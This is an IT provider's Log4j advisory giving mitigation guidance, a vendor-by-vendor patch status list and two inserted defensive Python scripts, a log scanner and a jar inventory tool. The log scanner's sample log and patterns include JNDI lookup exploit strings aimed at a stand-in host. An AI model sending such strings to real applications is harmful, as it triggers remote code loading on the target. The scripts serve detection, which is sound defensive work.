You may have seen recent news concerning the latest cyber threat, “Log4j”. Log4j is an open-source logging utility used in countless apps by organizations of all sizes. The flaw in Log4j is a Remote Code Execution (RCE) vulnerability: it lets attackers easily gain remote access to, and run code on, computers that run applications written in Java, a popular programming language.
At this time, many applications do not yet have a patch released, but many of them do have a workaround that can be put in place.
If you are one of Conversant’s fully managed clients, you have already heard from us on this situation, as we are currently applying the patches and workarounds across your organization’s environment. You do not need to read further unless you are a managed client that has not yet adopted deep packet inspection with all advanced services enabled, SOC-as-a-Service, and an advanced EDR platform, such as CrowdStrike. Every organization is in a different position in its security evolution, so there are actions required of you to properly mitigate and remediate this situation.
The publicly available news suggests over 840,000 companies have been identified by the threat actors as being vulnerable. Threat actors are actively exploiting this vulnerability, and it can be leveraged to gain remote access to your environments, execute code, and encrypt and/or steal your data. If your organization does not have active security tool and log monitoring, you likely will not notice threat actor activity until the threat actor drops a payload that causes your systems to stop functioning as normal.
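As an added example, not part of the original advisory, the following Python script shows the kind of log check the paragraph above is talking about: it reads web-server or application log lines and flags the ones carrying a Log4j lookup string. Each line is URL-decoded first, because proxies and access logs often record the request percent-encoded, and two patterns are then applied: the literal `${jndi:` lookup prefix (case-insensitive) and any lookup nested inside another lookup, which ordinary request data does not contain. The sample log lines, the hostnames and the IP addresses (from the documentation range) are constructed for this example.

```python
"""Added example: flag Log4j lookup strings in application or web-server logs.

Each line is URL-decoded, then checked for (1) the literal "${jndi:" prefix,
case-insensitively, and (2) a lookup nested inside another lookup ("${...${"),
a structure ordinary request data never has. The sample log is constructed for
this example; the IP addresses are from the documentation range.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")

# Constructed sample: one benign line, three literal/encoded lookups, one nested lookup.
SAMPLE_LOG = (
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"\n'
    '10.0.0.9 - - [10/Dec/2021:12:00:07 +0000] "GET /login HTTP/1.1" 200 128 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"\n'
    '10.0.0.9 - - [10/Dec/2021:12:00:09 +0000] "GET /login HTTP/1.1" 200 128 "-" '
    '"${JNDI:dns://198.51.100.7/x}"\n'
    '10.0.0.9 - - [10/Dec/2021:12:00:11 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79"\n'
    '10.0.0.9 - - [10/Dec/2021:12:00:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NAME}}"\n'
)


def classify(line: str) -> str:
    """Return a short reason string for a suspicious line, or "" for a clean one."""
    decoded = unquote(line)  # normalise percent-encoding before matching
    if JNDI_RE.search(decoded):
        return "jndi-lookup"
    if NESTED_RE.search(decoded):
        return "nested-lookup"
    return ""


def scan_log(text: str) -> List[Dict[str, object]]:
    """Scan a block of log text; return one record per flagged line."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(text.splitlines(), start=1):
        reason = classify(line)
        if reason:
            hits.append({"line": number, "reason": reason, "text": line})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['reason']}: {hit['text']}")
```

Run it against a real access log with `scan_log(open(path).read())`; the point of the second pattern is that it triggers on structure rather than on a specific keyword, so it keeps working when the keyword is disguised, at the cost of an occasional false positive on applications that legitimately log nested `${...}` templates.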
Another vulnerability, or shortcoming, of the original fix has been discovered, and a third vulnerability is also believed to exist. Expect a chain of discovered vulnerabilities and associated fixes. Information is developing quickly on this situation. We care about you—please move briskly to mitigate this risk.
First, the good news. If you are using CrowdStrike, CrowdStrike will protect devices running their endpoint software. Partners running CrowdStrike can review a dedicated Log4j dashboard in the CrowdStrike portal, which shows any exploit attempts against your devices. This dashboard is accessed by going to Investigate -> Vulnerabilities -> Log4Shell Vulnerability Dashboard within the CrowdStrike portal. If you are not running CrowdStrike, you should strongly consider adopting it as a complement to your other endpoint controls. Conversant has a strong partnership with CrowdStrike, and we can make this adoption painless: Log4j is not the first high-profile vulnerability, and it will not be the last. Additionally, CrowdStrike has a service called Spotlight that provides even more insight into vulnerable systems; this service is often purchased separately.
Additionally, Fortinet, and likely other firewall vendors, have mitigations for the Log4j risks. The links for the Fortinet mitigations are noted below. Your SOC-as-a-Service vendor, such as eSentire, Arctic Wolf, AlertLogic, and others, may have specific recommendations for Log4j; you should consider reading your provider’s documentation.
You need to identify where Log4j is being used and follow each vendor’s instructions to patch or apply a workaround. To help, we have compiled the list below of common products you may use, including where these products/companies currently stand related to Log4j. Because the situation is changing quickly, we have included links so you can get their latest status.
If you would like us to assist with implementing any patches or workarounds, please email our support team at support@conversantgroup.com, and we will schedule resources to reach out and assist. Please note that we, and everyone else in the country, are overwhelmed right now, so please be patient as we move as fast as we can given the incredible volume of requests.
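The vendor list covers products you buy; for software your own teams build or deploy, you still have to find the log4j-core library itself. The following Python script is an added example (not part of this advisory and not a vendor tool) of how to do that. It walks a directory tree, opens every .jar/.war/.ear it finds, recurses into archives packed inside them (Spring Boot fat jars, for instance), and reports two facts the log4j-core artifact carries: the version recorded in `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties` and whether `org/apache/logging/log4j/core/lookup/JndiLookup.class`, the class the Apache-documented workaround removes, is still present. A jar needs action when that class is present and the version is unknown or older than `MIN_SAFE_VERSION`; the value used for that constant is an assumption for illustration only, so take the current figure from the Apache Log4j security page linked at the end of this advisory. The sample jars are constructed in memory so the script runs offline.

```python
"""Added example: locate log4j-core on disk and decide whether action is needed.

Every .jar/.war/.ear under a directory is opened (recursing into nested
archives) and checked for the log4j-core pom.properties (version) and the
JndiLookup class (present unless the documented workaround removed it).
MIN_SAFE_VERSION is an illustrative assumption; confirm the current value on
the Apache Log4j security page. Sample jars are constructed in memory.
"""
import io
import os
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
MIN_SAFE_VERSION = (2, 17, 0)  # assumption for illustration; check the Apache security page

Version = Optional[Tuple[int, ...]]


def parse_version(pom_properties: str) -> Version:
    """Read 'version=2.14.1' from pom.properties; None if absent or not purely numeric."""
    for line in pom_properties.splitlines():
        if line.startswith("version="):
            try:
                return tuple(int(p) for p in line.split("=", 1)[1].strip().split("."))
            except ValueError:
                return None
    return None


def inspect_archive(data: bytes, label: str, min_safe=MIN_SAFE_VERSION) -> List[Dict[str, object]]:
    """Return one finding per log4j-core artifact found in the archive or inside nested archives."""
    findings: List[Dict[str, object]] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container; nothing to inspect
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace")) if POM_PROPS in names else None
            jndi_present = JNDI_CLASS in names
            findings.append({
                "path": label,
                "version": version,
                "jndi_lookup_present": jndi_present,
                # workaround applied (class removed) or fixed version -> no action
                "needs_action": jndi_present and (version is None or version < min_safe),
            })
        for member in sorted(names):
            if member.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(member), f"{label}!{member}", min_safe))
    return findings


def scan_tree(root: str, min_safe=MIN_SAFE_VERSION) -> List[Dict[str, object]]:
    """Walk a directory and inspect every archive found."""
    findings: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path, min_safe))
    return findings


def build_sample_jar(version: str, include_jndi: bool) -> bytes:
    """Constructed stand-in for log4j-core holding only the two files the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not real bytecode
    return buf.getvalue()


def build_fat_jar(inner: bytes, inner_name: str) -> bytes:
    """Constructed application jar that bundles a library jar under BOOT-INF/lib."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(f"BOOT-INF/lib/{inner_name}", inner)
    return buf.getvalue()


if __name__ == "__main__":
    app = build_fat_jar(build_sample_jar("2.14.1", True), "log4j-core-2.14.1.jar")
    for finding in inspect_archive(app, "app.jar"):
        print(finding)
```

On a real host call `scan_tree("/opt")` (or wherever your Java applications live) and act on every finding with `needs_action` set. Note that a jar whose `version` comes back `None` but still contains `JndiLookup` is reported as needing action on purpose: an unknown version is not evidence of a fixed one.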
- Arctic Wolf – https://arcticwolf.com/resources/blog/log4j
  - Not impacted; however, a detection tool has been developed.
- Citrix – Citrix Security Advisory for Apache CVE-2021-44228
  - The following products are NOT impacted by the vulnerability at this time:
    - ADC
    - Cloud Connectors
    - License Server
    - SD-WAN
    - ShareFile Storage Zone Controllers
    - Virtual Apps and Desktops
    - Workspace App
- Cisco – Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021
  - The following products have been confirmed to be affected (or are under investigation, where noted). At this time there is no workaround, and a patch is being created.
    - Firepower Threat Defense/Firepower Device Manager
    - Identity Services Engine
    - Unified Communications Manager
    - ASA Software (under investigation)
    - Prime Infrastructure (under investigation)
    - Aironet Access Points (under investigation)
- Cohesity
  - Impacted by the vulnerability; there is no workaround at this time. A patch is currently being created.
- CrowdStrike
  - Released recommended settings to prevent Log4j exploitation.
  - We have verified that all our managed partners running CrowdStrike have the recommended settings applied/enabled in the portal.
- Dell Wyse Management Suite – DSA-2021-267: Dell Wyse Management Suite Security Update for Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
  - Impacted by the vulnerability.
  - Version 3.5.1 protects against the vulnerability.
- eSentire – https://www.esentire.com/security-advisories/critical-apache-zero-day-vulnerability
  - Not impacted; however, eSentire is actively monitoring.
- Fortinet – Log4j2 Vulnerability | FortiGuard
  - The following products are NOT impacted by the vulnerability:
    - FortiAnalyzer
    - FortiClient / EMS
    - FortiGate
    - FortiManager
  - The following product features help protect against the Log4j vulnerability:
    - FortiAnalyzer – Outbreak Detection, version 1.00038: detects indicators of the Log4j vulnerability from across the Security Fabric.
    - FortiAnalyzer – Threat Hunting, version 6.4+: detects indicators of the Log4j vulnerability from across the Security Fabric.
    - FortiClient / EMS – Application Firewall, version 19.218: blocks attack attempts to exploit the Remote Code Execution vulnerability in Apache Log4j.
    - FortiClient / EMS – Threat Hunting, version 6.2+: verify endpoint protections and monitor for any alerts related to Log4j2 exploit attempts.
    - FortiGate – IPS, version 19.218: blocks exploitation of the Log4j vulnerability.
- HPE Nimble
  - Not impacted by Log4j2 at this time.
- HPE SimpliVity and 3PAR – HPESBGN04215 rev.2 – Certain HPE Products using Apache Log4j2, Remote Code Execution | HPE Support
  - Certain versions of SimpliVity and 3PAR are impacted by Log4j.
- IGEL – ISN 2021-11: UMS Log4j vulnerability (igel.com)
  - Universal Management Suite (UMS) is impacted.
  - Currently no patch released.
  - There is a temporary workaround.
- Palo Alto – CVE-2021-44228 Informational: Impact of Log4j Vulnerability CVE-2021-44228 (paloaltonetworks.com)
  - No products impacted by Log4j2 at this time.
- Unitrends
  - Not impacted by Log4j2 at this time.
- VMware – https://kb.vmware.com/s/article/87068
  - Horizon View – Impacted. Currently no patch released; the VMware article linked above describes a temporary workaround.
  - vRealize – Impacted. Currently no patch released; the VMware article linked above describes a temporary workaround.
  - Site Recovery – Impacted. Currently no patch released; the VMware article linked above describes a temporary workaround.
  - vCenter Appliance – Impacted. Currently no patch released; the VMware article linked above describes a temporary workaround.
Other Relevant Links:
- https://github.com/cisagov/log4j-affected-db
- https://github.com/NCSC-NL/log4shell/tree/main/software
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://logging.apache.org/log4j/2.x/security.html